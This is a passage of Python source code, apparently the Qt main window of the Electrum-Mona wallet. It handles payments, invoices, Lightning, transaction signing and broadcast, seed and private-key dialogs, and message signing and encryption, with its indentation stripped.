errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice):
amount_sat = self.amount_e.get_amount()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
try:
self.wallet.lnworker.pay(invoice, amount_sat, attempts)
except Exception as e:
self.show_error(str(e))
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
def on_invoice_status(self, key, status, log):
if key not in self.wallet.invoices:
return
self.invoice_list.update_item(key, status, log)
if status == PR_PAID:
self.show_message(_('Payment succeeded'))
self.need_update.set()
elif status == PR_FAILED:
self.show_error(_('Payment failed'))
else:
pass
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self.is_onchain:
invoice = self.payto_e.lightning_invoice
if not invoice:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
return self.wallet.lnworker.parse_bech32_invoice(invoice)
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_preview(self):
self.do_pay(preview=True)
def do_pay(self, preview=False):
invoice = self.read_invoice()
if not invoice:
return
if not preview:
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_pay_invoice(invoice, preview)
def do_pay_invoice(self, invoice, preview=False):
if invoice['type'] == PR_TYPE_LN:
self.pay_lightning_invoice(invoice['invoice'])
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
message = invoice['message']
outputs = invoice['outputs']
else:
raise Exception('unknown invoice type')
if run_hook('abort_send', self):
return
outputs = [TxOutput(*x) for x in outputs]
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x: x.value, outputs))
fee = tx.get_fee()
#use_rbf = bool(self.config.get('use_rbf', True))
#if use_rbf:
# tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
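# Worked example of the relay-fee guard above: relayfee() is in sat/kB,
# so with a relay fee of 1000 sat/kB a 225-byte transaction must pay at
# least 1000 * 225 / 1000 = 225 satoshis to be propagated by the server.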
if preview:
self.show_transaction(tx, message)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
self.do_clear()
if not tx.is_complete():
self.show_transaction(tx)
else:
self.broadcast_transaction(tx, message)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
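# Threading contract assumed here: WaitingDialog runs `task` off the GUI
# thread while showing a modal progress dialog, then delivers
# on_success/on_failure back on the GUI thread, so callback(True/False)
# may safely update widgets.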
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
key = pr.get_id()
#self.wallet.set_invoice_paid(key, tx.txid())
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
@protected
def open_channel(self, *args, **kwargs):
def task():
return self.wallet.lnworker.open_channel(*args, **kwargs)
def on_success(chan):
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
self.show_message(message)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(e))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
from electrum_mona.lnaddr import lndecode, LnDecodeException
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self.is_onchain = b
self.preview_button.setEnabled(b)
self.max_button.setEnabled(b)
self.show_send_tab_onchain_fees(b)
def show_send_tab_onchain_fees(self, b: bool):
self.feecontrol_fields.setEnabled(b)
#self.fee_e_label.setVisible(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.is_onchain = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.set_onchain(len(coins) > 0)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
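# Pre-fill the paytomany editor with one "address, 0" line per contact; the user replaces each 0 placeholder with an amount.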
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
self.show_error('Cannot find payment request in wallet.')
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.wallet.delete_invoices(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def pay_bip70_invoice(self, key):
pr = self.wallet.get_invoice(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.storage.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum_mona,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
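# mkfunc captures 'method' in a closure so each console command binds its own name; defining the lambda inline in the loop below would hit Python's late-binding pitfall.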
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_mona.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file every time you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
#else:
#lightning_b = QPushButton(_('Enable'))
#lightning_b.clicked.connect(dialog.close)
#lightning_b.clicked.connect(self.enable_lightning)
#lightning_label = QLabel(_('Disabled'))
#grid.addWidget(QLabel(_('Lightning')), 5, 0)
#grid.addWidget(lightning_label, 5, 1)
#grid.addWidget(lightning_b, 5, 2)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt) -> Optional[Transaction]:
from electrum_mona.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum_mona import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
